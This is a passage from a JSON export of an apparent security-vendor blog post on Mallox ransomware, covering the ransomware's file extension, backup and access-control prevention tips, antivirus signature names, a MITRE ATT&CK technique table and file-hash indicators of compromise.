srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/20_Encryption-function-650x88.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/20_Encryption-function-300x41.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/20_Encryption-function-150x20.png 150w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/20_Encryption-function.png 751w\" sizes=\"(max-width: 650px) 100vw, 650px\" \/><figcaption id=\"caption-attachment-91939\" class=\"wp-caption-text\"><em>Fig20: Encryption Function<\/em><\/figcaption><\/figure>\n<p>After encryption, it appends \u201c.Mallox\u201d as a file extension.<\/p>\n<figure id=\"attachment_91938\" aria-describedby=\"caption-attachment-91938\" style=\"width: 441px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-91938 size-full\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2023\/08\/21_Use-of-.malox-extension-after-encryption.png\" alt=\"\" width=\"441\" height=\"174\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/21_Use-of-.malox-extension-after-encryption.png 441w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/21_Use-of-.malox-extension-after-encryption-300x118.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2023\/08\/21_Use-of-.malox-extension-after-encryption-150x59.png 150w\" sizes=\"(max-width: 441px) 100vw, 441px\" \/><figcaption id=\"caption-attachment-91938\" class=\"wp-caption-text\"><em>Fig 21: Use of .Mallox File Extension<\/em><\/figcaption><\/figure>\n<h3><strong>Tips to Prevent Such Kinds of Attacks:<\/strong><\/h3>\n<ul>\n<li><strong>Restricting Access to Shared Folders:<\/strong> Use network separation to limit access to shared folders only to those who need it. Apply strong access controls to ensure that only authorized individuals can make changes to shared data on the network.<\/li>\n<li><strong>Regular Data Backups:<\/strong> Consistently back up shared data to a secure and isolated location. Periodically test backups to verify data integrity and to ensure a swift data restoration process in the event of an attack.<\/li>\n<li><strong>Scheduled Offline Backups:<\/strong> Maintain offline backups of critical shared data to protect against ransomware attacks that may attempt to encrypt live \/ online backups.<\/li>\n<\/ul>\n<p>By adhering to these precautions, we can significantly reduce the risk of Mallox Ransomware attacks targeting Microsoft SQL Server instances and bolster the overall security posture of our environment.<\/p>\n<h3><strong>How does Quick Heal Protect its Customers from Mallox Ransomware?<\/strong><\/h3>\n<p>Quick Heal AntiVirus has signatures for various script files utilized in the attack, as well as for the Ransom payload. The signatures against this Ransomware are as indicated below:<\/p>\n<ul>\n<li>Ransom.Mallox.S28994722<\/li>\n<li>PS.Downloader.Boxter.47436<\/li>\n<li>BAT.Agent.CQ<\/li>\n<li>Script.Trojan-Downloader.A8341828<\/li>\n<li>Script.Trojan.A8269601<\/li>\n<\/ul>\n<p><strong>To know more about Quick Heal\u2019s range of digital protection visit \u2013 <\/strong><\/p>\n<p><a href=\"https:\/\/www.quickheal.com\/\">https:\/\/www.quickheal.com\/<\/a><\/p>\n<h3><strong>Conclusion:<\/strong><\/h3>\n<p>As cyberthreats grow in sophistication, the Mallox Ransomware emerges as a stealthy and ever-evolving adversary.<\/p>\n<p>Its strategy is clear, to target unguarded MSSQL Servers as its starting point.\u00a0Once inside, it unleashes a complex infection chain using the combination of malicious files to inject chaos into the system\u2019s processes under the shroud of encryption.<\/p>\n<p>The Mallox Ransomware, with its intricate threads of malevolence, preys on vulnerability, turning your digital world into a high-stakes battleground. A typical digital hostage situation, where the demand is clear &#8211;\u00a0 your precious data or payment for freedom!<\/p>\n<p>Quick Heal\u2019s signature-based protection offers a defense against this ransomware variant.<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>MITRE ATT&amp;CK TTPs:<\/strong><\/h3>\n<table>\n<tbody>\n<tr>\n<td width=\"297\"><strong>Command and Scripting Interpreter<\/strong><\/td>\n<td width=\"297\"><strong>T1059<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"297\"><strong>Inhibit System Recovery<\/strong><\/td>\n<td width=\"297\"><strong>T1490<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"297\"><strong>File and Directory Discovery<\/strong><\/td>\n<td width=\"297\"><strong>T1083<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"297\"><strong>System Information Discovery<\/strong><\/td>\n<td width=\"297\"><strong>T1082<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"297\"><strong>Data Encrypted for Impact<\/strong><\/td>\n<td width=\"297\"><strong>T1486<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"297\"><strong>Service Stop<\/strong><\/td>\n<td width=\"297\"><strong>T1489<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><\/h3>\n<h3><strong>IOCs:<\/strong><\/h3>\n<p>Bat loader:<\/p>\n<p>77BFCEE98F086C8E25A69D252A6609E1<\/p>\n<p>08D4D184E6E3484E8B676FA0E0A24AFA<\/p>\n<p>Payload:<\/p>\n<p>1B7578D04324CD6C8BF11985B79A814A<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Co-Authors:<\/strong><\/p>\n<p><strong>Soumen Burma<\/strong><\/p>\n<p><strong>Umar Khan<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction: First observed in the middle of 2021, &#8216;Mallox&#8217; Ransomware has emerged as a formidable threat in the cyber crime landscape. With its ability to encrypt all volumes, including local and network shared drives, it gradually spreads its control over the system, leaving victims in a state of digital despair. Mallox Ransomware uses the \u201c.mallox\u201d [&hellip;]<\/p>\n","protected":false},"author":60,"featured_media":91958,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1660,164,289,1739,24,1495,599,1191,1],"tags":[1913,431,1736,534,1995,1923,1996,50,1249],"class_list":["post-91936","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-advisory","category-cyber-crime","category-cyber-safety","category-cybersecurity","category-malware","category-nransomware","category-tech-2","category-tech-terms","category-uncategorized","tag-ransomwareprevention","tag-android","tag-cybersafety","tag-cybersecurity","tag-mallox","tag-quickheal","tag-quickheal-security","tag-ransomware","tag-windows"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/91936"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/60"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=91936"}],"version-history":[{"count":8,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/91936\/revisions"}],"predecessor-version":[{"id":91962,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/91936\/revisions\/91962"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/91958"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=91936"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=91936"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=91936"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}